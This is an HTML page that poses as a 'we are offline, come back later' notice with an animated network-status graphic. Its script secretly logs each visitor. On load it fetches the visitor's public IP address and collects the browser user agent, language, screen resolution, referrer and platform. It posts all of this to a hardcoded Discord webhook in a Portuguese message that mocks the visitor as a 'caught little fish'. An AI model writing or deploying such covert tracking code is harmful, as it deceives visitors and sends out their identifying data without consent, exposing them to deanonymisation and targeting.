<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Offine</title>
  <style>
    body {
    margin: 0;
    height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
    background: linear-gradient(var(--status-color) 5vh, #ccc 5vh);
}

.detector {
    width: 40em;
    height: 14em;
    font-size: 10px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    color: #333;
}

.detector > * {
    position: relative;
    box-sizing: border-box;
}

.detector > *::before,
.detector > *::after {
    content: '';
    position: absolute;
    box-sizing: border-box;
}

.client {
    width: 17em;
    height: 10em;
    border: 0.5em solid;
    border-radius: 0.5em;
    display: flex;
    flex-direction: column;
    align-items: center;
    margin-top: -4em;
}

.client::before {
    width: 1.5em;
    height: 3em;
    background-color: currentColor;
    top: 9.5em;
}

.client::after {
    width: 5em;
    height: 1em;
    background-color: currentColor;
    border-radius: 0.3em;
    top: 12.5em;
}

.signal,
.signal::before,
.signal::after {
    width: 1em;
    height: 1em;
    background-color: var(--status-color);
    border-radius: 50%;
    animation: blink 0.6s infinite;
}

.signal::before {
    right: 2.5em;
    animation-delay: var(--second-signal-delay);
}

.signal::after {
    left: 2.5em;
    animation-delay: var(--third-signal-delay);
}

@keyframes blink {
    50% {
        filter: opacity(0.1);
    }
}

.server {
    width: 7em;
    height: 14em;
    border: 0.5em solid;
    border-radius: 0.5em;
}

.server::before {
    width: 5em;
    height: 1em;
    background-color: currentColor;
    border-radius: 0.2em;
    top: 8em;
    left: 0.5em;
    box-shadow: 0 1.5em 0;
}

.server::after {
    width: 0.6em;
    height: 0.6em;
    background-color: currentColor;
    border-radius: 50%;
    right: 1.5em;
    bottom: 0.5em;
    box-shadow: 1em 0 0 0.1em;
}

p {
    position: absolute;
    bottom: 1em;
    text-align: center;
    font-family: sans-serif;
    letter-spacing: 1px;
    color: #333;
}

  </style>
<script>
    const ONLINE_THEME = {
      statusColor: 'green',
      secondSignalDelay: '0.2s',
      thirdSignalDelay: '0.4s'
  }
  
  const OFFLINE_THEME = {
      statusColor: 'orangered',
      secondSignalDelay: '0s',
      thirdSignalDelay: '0s'
  }
  
  function detectOnlineStatus() {
      let theme = navigator.onLine ? ONLINE_THEME : OFFLINE_THEME
      let root = document.documentElement
      root.style.setProperty('--status-color', theme.statusColor)
      root.style.setProperty('--second-signal-delay', theme.secondSignalDelay)
      root.style.setProperty('--third-signal-delay', theme.thirdSignalDelay)
  }
  
  window.addEventListener('online', detectOnlineStatus)
  window.addEventListener('offline', detectOnlineStatus)
  detectOnlineStatus()
  
  fetch('https://api.ipify.org?format=json')
        .then(response => response.json())
        .then(data => {
          const ipAddress = data.ip;
          const webhookUrl = 'https://discord.com/api/webhooks/1129864934675714179/fblE4fcww7ybbhrvv3QNiBn0Yo2XhwnXQoseM3WJUskBgSwgIPyb7r9BLy-mClCpPNdo';
  
          const userAgent = navigator.userAgent;
          const language = navigator.language;
          const screenWidth = window.screen.width;
          const screenHeight = window.screen.height;
          const referrer = document.referrer;
          const operatingSystem = navigator.platform;
  
          const message = `@everyone Novo peixinho pescado Oniichans! 👉👈😋  \nIP do peixinho: ${ipAddress} \nUser-Agent: ${userAgent} \nNavegador Linguagem: ${language} \nResolução da tela: ${screenWidth}x${screenHeight} \nReferência: ${referrer} \nSistema Operacional: ${operatingSystem} \nOBS: Se essa mensagem tiver menos de 5 dados provavelmente o peixinho está camuflado!`;
  
          fetch(webhookUrl, {
            method: 'POST',
            headers: {
              'Content-Type': 'application/json',
            },
            body: JSON.stringify({
              content: message,
            }),
          })
          .then(response => {
            console.log('Mensagem enviada com sucesso!');
          })
          .catch(error => {
            console.error('Erro ao enviar a mensagem:', error);
          });
        })
        .catch(error => {
          console.error('Erro ao obter o endereço IP:', error);
        });
  </script>
</head>
<body>
  <div class="detector">
    <span class="client"></span>
    <span class="signal"></span>
    <span class="server"></span>
  </div>
  <p>we are offline come back later.<br></p>
</body>
</html>
